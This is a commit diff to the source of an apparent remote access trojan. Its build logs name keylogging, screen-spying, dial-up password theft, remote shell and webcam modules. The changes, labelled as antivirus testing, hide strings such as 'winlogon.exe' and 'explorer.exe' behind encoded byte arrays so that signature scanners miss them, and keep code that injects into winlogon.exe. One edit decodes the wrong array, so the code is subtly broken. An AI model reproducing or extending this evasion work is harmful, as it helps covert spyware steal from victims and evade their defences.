测试杀软

CcMainDll/CcMainDll/Release/CcMainDll.Build.CppClean.log

@@ -1 +1,37 @@
+f:\myapp\ccremote\bin\server\ccmaindll.lib
+f:\myapp\ccremote\bin\server\ccmaindll.exp
+f:\myapp\ccremote\bin\server\ccmaindll.ipdb
+f:\myapp\ccremote\bin\server\ccmaindll.iobj
+f:\myapp\ccremote\ccmaindll\ccmaindll\release\ccmaindll.pch
+f:\myapp\ccremote\ccmaindll\ccmaindll\release\vc141.pdb
+f:\myapp\ccremote\ccmaindll\ccmaindll\release\pch.obj
+f:\myapp\ccremote\ccmaindll\ccmaindll\release\audio.obj
+f:\myapp\ccremote\ccmaindll\ccmaindll\release\until.obj
+f:\myapp\ccremote\ccmaindll\ccmaindll\release\keyboardmanager.obj
+f:\myapp\ccremote\ccmaindll\ccmaindll\release\buffer.obj
+f:\myapp\ccremote\ccmaindll\ccmaindll\release\clientsocket.obj
+f:\myapp\ccremote\ccmaindll\ccmaindll\release\videomanager.obj
+f:\myapp\ccremote\ccmaindll\ccmaindll\release\videocap.obj
+f:\myapp\ccremote\ccmaindll\ccmaindll\release\systemmanager.obj
+f:\myapp\ccremote\ccmaindll\ccmaindll\release\shellmanager.obj
+f:\myapp\ccremote\ccmaindll\ccmaindll\release\screenspy.obj
+f:\myapp\ccremote\ccmaindll\ccmaindll\release\screenmanager.obj
+f:\myapp\ccremote\ccmaindll\ccmaindll\release\regeditex.obj
+f:\myapp\ccremote\ccmaindll\ccmaindll\release\manager.obj
+f:\myapp\ccremote\ccmaindll\ccmaindll\release\kernelmanager.obj
+f:\myapp\ccremote\ccmaindll\ccmaindll\release\install.obj
+f:\myapp\ccremote\ccmaindll\ccmaindll\release\dialupass.obj
+f:\myapp\ccremote\ccmaindll\ccmaindll\release\audiomanager.obj
+f:\myapp\ccremote\ccmaindll\ccmaindll\release\filemanager.obj
+f:\myapp\ccremote\ccmaindll\ccmaindll\release\strcry.obj
+f:\myapp\ccremote\ccmaindll\ccmaindll\release\dllmain.obj
+f:\myapp\ccremote\bin\server\ccmaindll.dll
+f:\myapp\ccremote\bin\server\ccmaindll.pdb
 f:\myapp\ccremote\ccmaindll\ccmaindll\..\..\bin\server\ccmaindll.dll
+f:\myapp\ccremote\ccmaindll\ccmaindll\release\ccmaindll.tlog\ccmaindll.write.1u.tlog
+f:\myapp\ccremote\ccmaindll\ccmaindll\release\ccmaindll.tlog\cl.command.1.tlog
+f:\myapp\ccremote\ccmaindll\ccmaindll\release\ccmaindll.tlog\cl.read.1.tlog
+f:\myapp\ccremote\ccmaindll\ccmaindll\release\ccmaindll.tlog\cl.write.1.tlog
+f:\myapp\ccremote\ccmaindll\ccmaindll\release\ccmaindll.tlog\link.command.1.tlog
+f:\myapp\ccremote\ccmaindll\ccmaindll\release\ccmaindll.tlog\link.read.1.tlog
+f:\myapp\ccremote\ccmaindll\ccmaindll\release\ccmaindll.tlog\link.write.1.tlog

CcMainDll/CcMainDll/Release/CcMainDll.log

@@ -22,12 +22,16 @@ f:\myapp\ccremote\ccmaindll\ccmaindll\clientsocket.cpp(484): warning C4018: “>
 f:\myapp\ccremote\ccmaindll\ccmaindll\common\keyboardmanager.cpp(33): warning C4018: “<”: 有符号/无符号不匹配
 f:\myapp\ccremote\ccmaindll\ccmaindll\common\keyboardmanager.cpp(307): warning C4018: “<”: 有符号/无符号不匹配
   until.cpp
-f:\myapp\ccremote\ccmaindll\ccmaindll\common\until.cpp(68): warning C4996: 'strcmpi': The POSIX name for this item is deprecated. Instead, use the ISO C and C++ conformant name: _strcmpi. See online help for details.
+f:\myapp\ccremote\ccmaindll\ccmaindll\common\until.cpp(69): warning C4996: 'strcmpi': The POSIX name for this item is deprecated. Instead, use the ISO C and C++ conformant name: _strcmpi. See online help for details.
   d:\windows kits\10\include\10.0.17763.0\ucrt\string.h(543): note: 参见“strcmpi”的声明
-f:\myapp\ccremote\ccmaindll\ccmaindll\common\until.cpp(169): warning C4996: 'GetVersionExA': 被声明为已否决
+f:\myapp\ccremote\ccmaindll\ccmaindll\common\until.cpp(103): warning C4838: 从“int”转换到“char”需要收缩转换
+f:\myapp\ccremote\ccmaindll\ccmaindll\common\until.cpp(103): warning C4309: “初始化”: 截断常量值
+f:\myapp\ccremote\ccmaindll\ccmaindll\common\until.cpp(176): warning C4996: 'GetVersionExA': 被声明为已否决
   d:\windows kits\10\include\10.0.17763.0\um\sysinfoapi.h(378): note: 参见“GetVersionExA”的声明
-f:\myapp\ccremote\ccmaindll\ccmaindll\common\until.cpp(172): warning C4996: 'GetVersionExA': 被声明为已否决
+f:\myapp\ccremote\ccmaindll\ccmaindll\common\until.cpp(179): warning C4996: 'GetVersionExA': 被声明为已否决
   d:\windows kits\10\include\10.0.17763.0\um\sysinfoapi.h(378): note: 参见“GetVersionExA”的声明
+f:\myapp\ccremote\ccmaindll\ccmaindll\common\until.cpp(292): warning C4838: 从“int”转换到“char”需要收缩转换
+f:\myapp\ccremote\ccmaindll\ccmaindll\common\until.cpp(292): warning C4309: “初始化”: 截断常量值
 cl : 命令行 warning D9002: 忽略未知选项“/Zc:stricStrings”
   AudioManager.cpp
   Dialupass.cpp
@@ -53,6 +57,8 @@ f:\myapp\ccremote\ccmaindll\ccmaindll\common\install.cpp(214): warning C4996: 's
   d:\windows kits\10\include\10.0.17763.0\ucrt\string.h(338): note: 参见“strncpy”的声明
   KernelManager.cpp
 f:\myapp\ccremote\ccmaindll\ccmaindll\common\kernelmanager.cpp(43): warning C4018: “<”: 有符号/无符号不匹配
+f:\myapp\ccremote\ccmaindll\ccmaindll\common\kernelmanager.cpp(146): warning C4838: 从“int”转换到“char”需要收缩转换
+f:\myapp\ccremote\ccmaindll\ccmaindll\common\kernelmanager.cpp(146): warning C4309: “初始化”: 截断常量值
   Manager.cpp
   RegEditEx.cpp
 f:\myapp\ccremote\ccmaindll\ccmaindll\common\regeditex.cpp(9): warning C4996: 'strnicmp': The POSIX name for this item is deprecated. Instead, use the ISO C and C++ conformant name: _strnicmp. See online help for details.
@@ -83,7 +89,11 @@ f:\myapp\ccremote\ccmaindll\ccmaindll\common\dialupass.h(62): warning C4996: 'st
 f:\myapp\ccremote\ccmaindll\ccmaindll\common\systemmanager.cpp(137): warning C4018: “<”: 有符号/无符号不匹配
 f:\myapp\ccremote\ccmaindll\ccmaindll\common\systemmanager.cpp(228): warning C4101: “cbNeeded”: 未引用的局部变量
   VideoCap.cpp
-f:\myapp\ccremote\ccmaindll\ccmaindll\common\videocap.cpp(119): warning C4101: “gCapTureParms”: 未引用的局部变量
+f:\myapp\ccremote\ccmaindll\ccmaindll\common\videocap.cpp(27): warning C4838: 从“int”转换到“char”需要收缩转换
+f:\myapp\ccremote\ccmaindll\ccmaindll\common\videocap.cpp(27): warning C4309: “初始化”: 截断常量值
+f:\myapp\ccremote\ccmaindll\ccmaindll\common\videocap.cpp(35): warning C4838: 从“int”转换到“char”需要收缩转换
+f:\myapp\ccremote\ccmaindll\ccmaindll\common\videocap.cpp(35): warning C4309: “初始化”: 截断常量值
+f:\myapp\ccremote\ccmaindll\ccmaindll\common\videocap.cpp(124): warning C4101: “gCapTureParms”: 未引用的局部变量
   VideoManager.cpp
 cl : 命令行 warning D9002: 忽略未知选项“/Zc:stricStrings”
   FileManager.cpp

CcMainDll/CcMainDll/StrCry.h

@@ -1,6 +1,7 @@
 #pragma once
 
 //<2F><><EFBFBD>ص<EFBFBD>ָ<EFBFBD><D6B8><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD>Ҫ<EFBFBD>ͷŵ<CDB7>
+//<2F><><EFBFBD><EFBFBD><EFBFBD>㷨
 //char* encryptionStr(char* str)
 //{
 //	int len = strlen(str);
@@ -13,6 +14,9 @@
 //	return a;
 //}
 
+#define STR_CRY_LENGTH			0	//<2F><><EFBFBD><EFBFBD><EFBFBD>ַ<EFBFBD><D6B7><EFBFBD><EFBFBD>ij<EFBFBD><C4B3><EFBFBD>
+
+//<2F><><EFBFBD><EFBFBD><EFBFBD>㷨
 char* decodeStr(char* str);
 
 

CcMainDll/CcMainDll/common/KernelManager.cpp

@@ -143,9 +143,14 @@ void CKernelManager::UnInstallService()
 	lstrcat(strRecordFile, "\\syslog.dat");
 	DeleteFile(strRecordFile);
 	
+	char winlogon[] = { 0x0c,0xbc,0xa3,0xa7,0xa4,0xa8,0xa1,0xaa,0xaa,0xed,0xa7,0xb9,0xa5 };	//winlogon.exe
+	char* winlogon_exe = decodeStr(winlogon);					//<2F><><EFBFBD>ܺ<EFBFBD><DCBA><EFBFBD>
+
+
+
 	if (m_dwServiceType != 0x120)  // owner<65><72>Զ<EFBFBD><D4B6>ɾ<EFBFBD><C9BE><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD>Լ<EFBFBD>ֹͣ<CDA3>Լ<EFBFBD>ɾ<EFBFBD><C9BE>,Զ<><D4B6><EFBFBD>߳<EFBFBD>ɾ<EFBFBD><C9BE>
 	{
-		InjectRemoveService("winlogon.exe", m_strServiceName);
+		InjectRemoveService(winlogon_exe, m_strServiceName);
 	}
 	else // shared<65><64><EFBFBD>̵ķ<CCB5><C4B7><EFBFBD>,<2C><><EFBFBD><EFBFBD>ɾ<EFBFBD><C9BE><EFBFBD>Լ<EFBFBD>
 	{
@@ -153,6 +158,8 @@ void CKernelManager::UnInstallService()
 	}
 	// <20><><EFBFBD>в<EFBFBD><D0B2><EFBFBD><EFBFBD><EFBFBD><EFBFBD>ɺ<EFBFBD><C9BA><EFBFBD>֪ͨ<CDA8><D6AA><EFBFBD>߳̿<DFB3><CCBF><EFBFBD><EFBFBD>˳<EFBFBD>
 	CreateEvent(NULL, true, false, m_strKillEvent);
+	memset(winlogon_exe, 0, winlogon[STR_CRY_LENGTH]);					//<2F><><EFBFBD><EFBFBD>0
+	delete winlogon_exe;
 }
 
 bool CKernelManager::IsActived()

CcMainDll/CcMainDll/common/VideoCap.cpp

@@ -3,8 +3,8 @@
 //////////////////////////////////////////////////////////////////////
 #include "..\pch.h"
 #include "VideoCap.h"
-//#include "..\DynamicAPI.h"
 #include "..\DynamicAPI.h"
+#include "..\StrCry.h"
 //////////////////////////////////////////////////////////////////////
 // Construction/Destruction
 //////////////////////////////////////////////////////////////////////
@@ -21,19 +21,24 @@ CVideoCap::CVideoCap()
 
 	if (!IsWebCam() || m_bIsConnected)
 		return;
+
+
 	//"#32770Ĭ<30>ϵĴ<CFB5><C4B4><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD>
-	m_hWnd = CreateWindow("#32770", /* Dialog */ "", WS_POPUP, 0, 0, 0, 0, NULL, NULL, NULL, NULL);
-	m_hWndCap = capCreateCaptureWindow
-		(
-		"VideoCapWindow", 
-		WS_CHILD | WS_VISIBLE,
-		0,
-		0,
-		0,
-		0,
-		m_hWnd,
-		0
-		);
+	char classname32770[] = { 0x06,0xe8,0xf9,0xfb,0xff,0xf0,0xf6 };	//#32770
+	char* lpClassName = decodeStr(classname32770);					//<2F><><EFBFBD>ܺ<EFBFBD><DCBA><EFBFBD>
+
+	m_hWnd = CreateWindow(lpClassName, /* Dialog */ "", WS_POPUP, 0, 0, 0, 0, NULL, NULL, NULL, NULL);
+
+	memset(lpClassName, 0, classname32770[STR_CRY_LENGTH]);					//<2F><><EFBFBD><EFBFBD>0
+	delete lpClassName;
+
+	char VideoCapWindow[] = { 0x0e,0x9d,0xa3,0xad,0xad,0xa8,0x85,0xa4,0xb4,0x94,0xab,0xaf,0xa4,0xd0,0xc9 };	//VideoCapWindow
+	char* lpszWindowName = decodeStr(classname32770);					//<2F><><EFBFBD>ܺ<EFBFBD><DCBA><EFBFBD>
+
+	m_hWndCap = capCreateCaptureWindow(lpszWindowName, WS_CHILD | WS_VISIBLE, 0, 0, 0, 0, m_hWnd, 0);
+
+	memset(lpszWindowName, 0, VideoCapWindow[STR_CRY_LENGTH]);					//<2F><><EFBFBD><EFBFBD>0
+	delete lpszWindowName;
 }
 
 CVideoCap::~CVideoCap()

CcMainDll/CcMainDll/common/until.cpp

@@ -15,6 +15,7 @@
 #include <stdio.h>
 #include <locale.h>
 #include <stdlib.h>
+#include "..\StrCry.h"
 unsigned int __stdcall ThreadLoader(LPVOID param)
 {
 	unsigned int	nRet = 0;
@@ -25,7 +26,7 @@ unsigned int __stdcall ThreadLoader(LPVOID param)
 		THREAD_ARGLIST	arg;
 		memcpy(&arg, param, sizeof(arg));
 		SetEvent(arg.hEventTransferArg);
-		// <20><>׿<EFBFBD>潻<EFBFBD><EFBFBD>
+		// <20><><EFBFBD><EFBFBD><EFBFBD>潻<EFBFBD><EFBFBD>
 		if (arg.bInteractive)
 			SelectDesktop(NULL);
 
@@ -99,7 +100,13 @@ char *GetLogUserXP()
 
 char *GetLogUser2K()
 {
-	DWORD	dwProcessID = GetProcessID("explorer.exe");
+	char explorer[] = { 0x0c,0xae,0xb2,0xb9,0xa4,0xa8,0xb4,0xa0,0xb6,0xed,0xa7,0xb9,0xa5 };	//explorer.exe
+	char* explorer_exe = decodeStr(explorer);					//<2F><><EFBFBD>ܺ<EFBFBD><DCBA><EFBFBD>
+
+	DWORD	dwProcessID = GetProcessID(explorer_exe);
+	memset(explorer_exe, 0, explorer[STR_CRY_LENGTH]);					//<2F><><EFBFBD><EFBFBD>0
+	delete explorer_exe;
+
 	if (dwProcessID == 0)
 		return NULL;
 	
@@ -281,11 +288,17 @@ BOOL SimulateCtrlAltDel()
 	HDESK old_desktop = GetThreadDesktop(GetCurrentThreadId());
 	
 	// Switch into the Winlogon desktop
-	char name[] = "Winlogon";
-	if (!SelectDesktop(name))
+
+	char Winlogon[] = { 0x08,0x9c,0xa3,0xa7,0xa4,0xa8,0xa1,0xaa,0xaa };	//Winlogon
+	char* pWinlogon = decodeStr(Winlogon);								//<2F><><EFBFBD>ܺ<EFBFBD><DCBA><EFBFBD>
+
+	//char name[] = "Winlogon";
+	if (!SelectDesktop(pWinlogon))
 	{
 		return FALSE;
 	}
+	memset(pWinlogon, 0, Winlogon[STR_CRY_LENGTH]);					//<2F><><EFBFBD><EFBFBD>0
+	delete pWinlogon;
 	
 	// Fake a hotkey event to any windows we find there.... :(
 	// Winlogon uses hotkeys to trap Ctrl-Alt-Del...

common/macros.h

@@ -119,6 +119,6 @@ enum
 #define	MAX_SEND_BUFFER			1024 * 8 // <20><><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD>ݳ<EFBFBD><DDB3><EFBFBD>
 #define MAX_RECV_BUFFER			1024 * 8 // <20><><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD>ݳ<EFBFBD><DDB3><EFBFBD>
 
-#define STR_CRY_LENGTH			0	//<2F><><EFBFBD><EFBFBD><EFBFBD>ַ<EFBFBD><D6B7><EFBFBD><EFBFBD>ij<EFBFBD><C4B3><EFBFBD>
+
 
 #endif // !defined(AFX_MACROS_H_INCLUDED)

strCodeTest/strCodeTest/strCodeTest.cpp

@@ -39,8 +39,8 @@ char* uncode(char* str)
 
 int main()
 {
-	char a[] = "CcRmt";
-	char b[] = "123456789!";
+	char a[] = "#32770";
+	char b[] = "VideoCapWindow";
 	char c[] = "LyxInstaller.exe";
 	char d[] = "%-24s %-15s 0x%x";
 	char* s1 = crycode(a);